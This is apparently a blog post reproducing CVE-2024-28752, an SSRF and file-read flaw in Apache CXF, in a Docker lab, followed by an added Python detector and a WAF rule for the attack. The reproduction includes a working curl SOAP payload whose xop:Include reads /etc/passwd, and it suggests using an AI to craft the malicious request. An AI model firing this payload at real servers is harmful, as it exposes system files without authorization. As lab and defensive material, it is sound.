CVE-2024-28752 Apache CXF Aegis databinding SSRF vulnerability (reproduction)

In a terminal in the CVE-2024-28752 directory, run `docker compose up -d` to start the container.
Visit ip:8080

Verify that the container has fully started and check the parameter types the service expects.
Visit http://192.168.75.132:8080/test?wsdl

Hand the parameter types to an AI to parse, and generate a precise malicious request.
Send the precise request with curl:

```bash
curl -X POST http://192.168.75.132:8080/test \
-H "Content-Type: multipart/related; boundary=----WebKitFormBoundary123456" \
--data-binary @- <<EOF
------WebKitFormBoundary123456
Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
   <soapenv:Header/>
   <soapenv:Body>
      <web:test>
         <arg0>
            <count>123</count>
            <text>
               <xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/passwd"/>
            </text>
            <you>true</you>
         </arg0>
      </web:test>
   </soapenv:Body>
</soapenv:Envelope>
------WebKitFormBoundary123456--
EOF
```

![image](https://img2024.cnblogs.com/blog/3680810/202507/3680810-20250727195019061-220203904.png)

Reproduction successful! Decode the output to view the contents of /etc/passwd.
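
A defensive check for the request above, as an added example that is not part of the original post: it flags any `xop:Include` whose `href` is not a `cid:` attachment reference, the only form the XOP specification defines. The function names and the benign `cid:` value are assumptions, and the sample bodies are constructed from the request shown on this page.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XOP_INCLUDE = "{http://www.w3.org/2004/08/xop/include}Include"

def xml_parts(body, boundary):
    """Return the XML payload of each part of a multipart body."""
    parts = []
    for chunk in body.replace("\r\n", "\n").split("--" + boundary):
        if chunk.strip() in ("", "--"):      # preamble or closing delimiter
            continue
        _headers, _, payload = chunk.partition("\n\n")
        if payload.lstrip().startswith("<"):
            parts.append(payload.strip())
    return parts

def suspicious_xop_hrefs(body, boundary):
    """List xop:Include href values that are not cid: attachment references."""
    findings = []
    for xml_text in xml_parts(body, boundary):
        if "<!DOCTYPE" in xml_text.upper():  # SOAP forbids DTDs; do not parse
            findings.append("<!DOCTYPE>")
            continue
        try:
            root = ET.fromstring(xml_text)
        except ET.ParseError:
            continue                         # not well-formed XML, nothing to inspect
        for inc in root.iter(XOP_INCLUDE):
            href = inc.get("href", "")
            if urlsplit(href).scheme.lower() != "cid":
                findings.append(href)
    return findings

BOUNDARY = "----WebKitFormBoundary123456"

def sample_body(href):
    """Constructed sample modelled on the request shown on this page."""
    return (
        f"--{BOUNDARY}\n"
        'Content-Disposition: form-data; name="1"\n\n'
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:web="http://service.namespace/"><soapenv:Body><web:test><arg0><text>'
        f'<xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="{href}"/>'
        "</text></arg0></web:test></soapenv:Body></soapenv:Envelope>\n"
        f"--{BOUNDARY}--\n"
    )

if __name__ == "__main__":
    print(suspicious_xop_hrefs(sample_body("file:///etc/passwd"), BOUNDARY))
    print(suspicious_xop_hrefs(sample_body("cid:part1@example.org"), BOUNDARY))
```

The same rule can be expressed in a WAF or reverse proxy in front of the CXF endpoint: reject SOAP requests whose `xop:Include` `href` uses any scheme other than `cid:`.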

posted @ 2025-07-27 19:53  小小葱油